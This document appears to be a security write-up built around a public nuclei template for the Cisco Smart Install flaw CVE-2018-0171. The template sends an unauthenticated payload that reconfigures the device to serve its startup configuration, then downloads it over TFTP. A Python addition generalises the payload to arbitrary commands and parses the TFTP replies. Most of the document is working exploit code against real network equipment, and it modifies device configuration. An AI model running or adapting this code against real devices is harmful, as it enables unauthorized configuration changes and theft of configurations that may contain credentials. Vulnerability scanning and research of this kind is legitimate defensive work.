A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. The PoC below does not exercise the memory-corruption path; it abuses the unauthenticated Smart Install protocol on TCP/4786 to hand the device the command string "configure tftp-server nvram:startup-config" (that is what the second hex payload decodes to) and then reads startup-config back over TFTP on UDP/69. Because that command changes the device's running configuration so that its TFTP server serves the startup configuration, the check is not read-only.
PoC code [public]
id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha,matejsmycka
  severity: critical
  description: |
    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
    - https://github.com/AlrikRr/Cisco-Smart-Exploit
    - http://www.securitytracker.com/id/1040580
    - https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    cwe-id: CWE-20,CWE-787
    epss-score: 0.93395
    epss-percentile: 0.99805
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev,vuln

flow: tcp(1) && javascript(1)

tcp:
  - inputs:
      - data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
        type: hex
      - data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        type: hex

    host:
      - "{{Hostname}}"
    port: 4786

    matchers:
      - type: word
        part: raw
        words:
          - ""
        internal: true

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);

    code: |
      let packet = bytes.NewBuffer();
      let message = "\x00\x01startup-config\x00octet\x00";
      packet.WriteString(message);
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      let resp = conn.Recv(4096);
      // Send a malformed packet, otherwise the TFTP server will not respond for around a minute
      let packet2 = bytes.NewBuffer();
      let message2 = "\x00\x05error";
      packet2.WriteString(message2);
      conn.SendHex(packet2.Hex());
      resp;

    args:
      Host: "{{Host}}"
      Port: 69

    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'NVRAM'
        condition: and

    extractors:
      - type: regex
        regex:
          - "version\\s+(\\d+\\.\\d+)"
# digest: 490a0046304402203bde4d0832b2597d34a6091c50225a847acfa2d809bd4be4974e2a70fd3102a802202e68e80720dadf9faa7a789a970c1330374620a94e88dc38edd9cbbd50eb035c:922c64590222798bb761d5b6d8e72950
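As an added example (it is not part of the nuclei template, nor Cisco or ProjectDiscovery code), the following Python builds and decodes the two kinds of message the template exchanges: the Smart Install exec message sent to TCP/4786, and the TFTP read request, DATA and ERROR packets on UDP/69, followed by the template's own word matchers and version extractor applied to the returned text. The byte layout of the exec message is taken from the template's second hex payload; the header field names (version, type, subtype, length) and the decision to treat the 24 bytes before the command as an opaque preamble are assumptions inferred from those bytes, and the sample startup-config is constructed, not captured from a device.

```python
"""Build/decode the Smart Install exec message and TFTP packets used by the
CVE-2018-0171 nuclei template above. Added example; header field names and
the opaque-preamble treatment are assumptions inferred from the template's
bytes, not documented Cisco structures."""
import re
import struct

# Second TCP payload of the template (hex copied verbatim from the template).
TEMPLATE_EXEC_PACKET_HEX = (
    "000000010000000100000008000001680001001400000001000000000021D863A560000000020154"
    "636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967"
    "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
)

# 24 bytes between the 16-byte header and the command string in the
# template's packet; carried here as an opaque constant (assumption).
EXEC_PREAMBLE = bytes.fromhex("0001001400000001000000000021D863A560000000020154")


def build_smi_exec(command: str, total_len: int = 0x168) -> bytes:
    """Reproduce the template's exec message for an arbitrary command:
    four big-endian uint32 header words (1, 1, 8, total_len), the preamble,
    the ASCII command, then zero padding up to total_len bytes."""
    body = EXEC_PREAMBLE + command.encode("ascii")
    if 16 + len(body) >= total_len:
        raise ValueError("command too long for the declared message length")
    header = struct.pack(">IIII", 1, 1, 8, total_len)
    return header + body.ljust(total_len - 16, b"\x00")


def parse_smi_exec(packet: bytes) -> dict:
    """Decode the header words and the NUL-terminated command string.
    Field names are assumed, not taken from a Cisco specification."""
    if len(packet) < 16 + len(EXEC_PREAMBLE):
        raise ValueError("packet too short for a Smart Install exec message")
    version, mtype, subtype, declared_len = struct.unpack(">IIII", packet[:16])
    cmd = packet[16 + len(EXEC_PREAMBLE):].split(b"\x00", 1)[0]
    return {"version": version, "type": mtype, "subtype": subtype,
            "declared_len": declared_len, "actual_len": len(packet),
            "command": cmd.decode("ascii", errors="replace")}


# RFC 1350 opcodes used below.
TFTP_RRQ, TFTP_DATA, TFTP_ERROR = 1, 3, 5


def tftp_rrq(filename: str, mode: str = "octet") -> bytes:
    """Read request: opcode 1, filename, NUL, mode, NUL (same bytes as the template)."""
    return struct.pack(">H", TFTP_RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def tftp_error(code: int = 0, msg: str = "error") -> bytes:
    """Well-formed ERROR packet: opcode 5, 16-bit error code, message, NUL.
    The template sends only the truncated b"\\x00\\x05error" to abort the transfer."""
    return struct.pack(">HH", TFTP_ERROR, code) + msg.encode() + b"\x00"


def parse_tftp(packet: bytes) -> dict:
    """Decode a DATA or ERROR reply; other opcodes are returned as-is."""
    opcode = struct.unpack(">H", packet[:2])[0]
    if opcode == TFTP_DATA:
        return {"opcode": "DATA", "block": struct.unpack(">H", packet[2:4])[0], "data": packet[4:]}
    if opcode == TFTP_ERROR:
        msg = packet[4:].split(b"\x00", 1)[0].decode(errors="replace")
        return {"opcode": "ERROR", "code": struct.unpack(">H", packet[2:4])[0], "message": msg}
    return {"opcode": opcode}


# The template's matcher (three words, condition: and) and version extractor.
MATCH_WORDS = ("boot-start-marker", "version", "NVRAM")
VERSION_RE = re.compile(r"version\s+(\d+\.\d+)")


def template_verdict(config_text: str) -> dict:
    """Apply the template's matchers and extractor to text returned over TFTP."""
    match = VERSION_RE.search(config_text)
    return {"matched": all(w in config_text for w in MATCH_WORDS),
            "version": match.group(1) if match else None}


# Constructed sample of a first TFTP DATA block (block 1) carrying a
# startup-config; not captured from any real device.
SAMPLE_CONFIG = (
    "!\n! NVRAM config last updated at 10:00:00 UTC Mon Mar 5 2018 by admin\n!\n"
    "version 15.2\nservice timestamps debug datetime msec\nhostname sw-edge-01\n!\n"
    "boot-start-marker\nboot-end-marker\n!\n"
)
SAMPLE_DATA_PACKET = struct.pack(">HH", TFTP_DATA, 1) + SAMPLE_CONFIG.encode()


if __name__ == "__main__":
    print(parse_smi_exec(bytes.fromhex(TEMPLATE_EXEC_PACKET_HEX)))
    reply = parse_tftp(SAMPLE_DATA_PACKET)
    print(reply["opcode"], reply["block"], template_verdict(reply["data"].decode()))
```

parse_smi_exec reports both the length word the header declares and the number of bytes actually present, which is the first thing to compare when a captured Smart Install message does not decode as expected. tftp_error shows the ERROR packet the template's truncated "\x00\x05error" stands in for; either one makes the device abandon the read, but only the well-formed one carries an error code and terminator as RFC 1350 requires.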